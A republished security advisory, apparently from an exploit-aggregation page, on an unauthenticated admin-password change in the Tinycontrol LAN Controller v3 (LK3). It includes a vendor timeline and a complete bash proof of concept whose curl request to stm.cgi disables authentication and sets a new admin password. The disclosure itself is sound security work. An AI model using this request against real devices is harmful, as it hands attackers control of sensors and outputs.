Gjoko KrsticZSL-2023-5787Tinycontrol LAN Controller v3 (LK3) Remote Admin Password Change
AI Score
Confidence
Low
Title: Tinycontrol LAN Controller v3 (LK3) Remote Admin Password Change
Advisory ID: ZSL-2023-5787
Type: Local/Remote
Impact: Security Bypass, Privilege Escalation, System Access
Risk: (5/5)
Release Date: 01.09.2023
Summary
Lan Controller is a very universal device that allows you to connect many different sensors and remotely view their readings and remotely control various types of outputs. It is also possible to combine both functions into an automatic if -> this with a calendar when -> then. The device provides a user interface in the form of a web page. The website presents readings of various types of sensors: temperature, humidity, pressure, voltage, current. It also allows you to configure the device, incl. event setting and controlling up to 10 outputs. Thanks to the support of many protocols, it is possible to operate from smartphones, collect and observ the results on the server, as well as cooperation with other I/O systems based on TCP/IP and Modbus.
Description
The application suffers from an insecure access control allowing an unauthenticated attacker to change accounts passwords and bypass authentication gaining panel control access.
Vendor
Tinycontrol - <https://www.tinycontrol.pl>
Affected Version
<=1.58a, HW 3.8
Tested On
lwIP
Vendor Status
[18.08.2023] Vulnerability discovered.
[19.08.2023] Vendor contacted.
[31.08.2023] No response from the vendor.
[01.09.2023] Public security advisory released.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <https://packetstormsecurity.com/files/174457/>
[2] <https://cxsecurity.com/issue/WLB-2023090013>
[3] <https://www.exploit-db.com/exploits/51732>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/275807>
Changelog
[01.09.2023] - Initial release
[22.09.2023] - Added reference [1] and [2]
[12.10.2023] - Added reference [3]
[14.02.2024] - Added reference [4]
Contact
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/bin/bash
: "
Tinycontrol LAN Controller v3 (LK3) Remote Admin Password Change
Vendor: Tinycontrol
Product web page: https://www.tinycontrol.pl
Affected version: <=1.58a, HW 3.8
Summary: Lan Controller is a very universal
device that allows you to connect many different
sensors and remotely view their readings and
remotely control various types of outputs.
It is also possible to combine both functions
into an automatic if -> this with a calendar
when -> then. The device provides a user interface
in the form of a web page. The website presents
readings of various types of sensors: temperature,
humidity, pressure, voltage, current. It also
allows you to configure the device, incl. event
setting and controlling up to 10 outputs. Thanks
to the support of many protocols, it is possible
to operate from smartphones, collect and observ
the results on the server, as well as cooperation
with other I/O systems based on TCP/IP and Modbus.
Desc: The application suffers from an insecure access
control allowing an unauthenticated attacker to
change accounts passwords and bypass authentication
gaining panel control access.
Tested on: lwIP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5787
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php
18.08.2023
"
set -euo pipefail
IFS=$'\n\t'
if [ $# -ne 2 ]; then
echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'
exit
fi
IP=$1
PW=$2
EN=$(echo -n $PW | base64)
curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==
# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/
echo -ne '\nAdmin password changed to: '$PW
</p></body></html>AI Score
Confidence
Low